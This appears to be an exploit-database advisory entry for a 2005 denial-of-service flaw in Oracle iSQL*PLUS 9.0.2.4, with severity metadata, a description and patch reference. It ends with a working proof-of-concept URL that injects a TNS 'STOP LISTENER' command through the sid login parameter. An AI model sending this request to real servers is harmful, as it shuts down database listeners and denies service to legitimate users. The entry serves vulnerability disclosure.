Oracle iSQL*PLUS TNS Listener Service Denial of Service Vulnerability

vendor:

iSQL*PLUS

by:

SecurityFocus

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: iSQL*PLUS

Affected Version From: 9.0.2.4

Affected Version To: 9.0.2.4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Oracle iSQL*PLUS TNS Listener Service Denial of Service Vulnerability

Oracle iSQL*PLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users. By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.

Mitigation:

Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities)

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15032/info

Oracle iSQL*PLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.

By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.

This issue was reported in Oracle Database version 9.0.2.4; other versions may also be affected.

These issues was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, these issues are being assigned a separate BID. 

http://www.example.com:3339/isqlplus?username=s&password=s&sid=%28DESCRIPTION%3D%28ADDRESS_LIST%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29%28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29%28SERVICE%3DLISTENER%29%28USER%3DHacker%29%29%29&login=Login&action=logon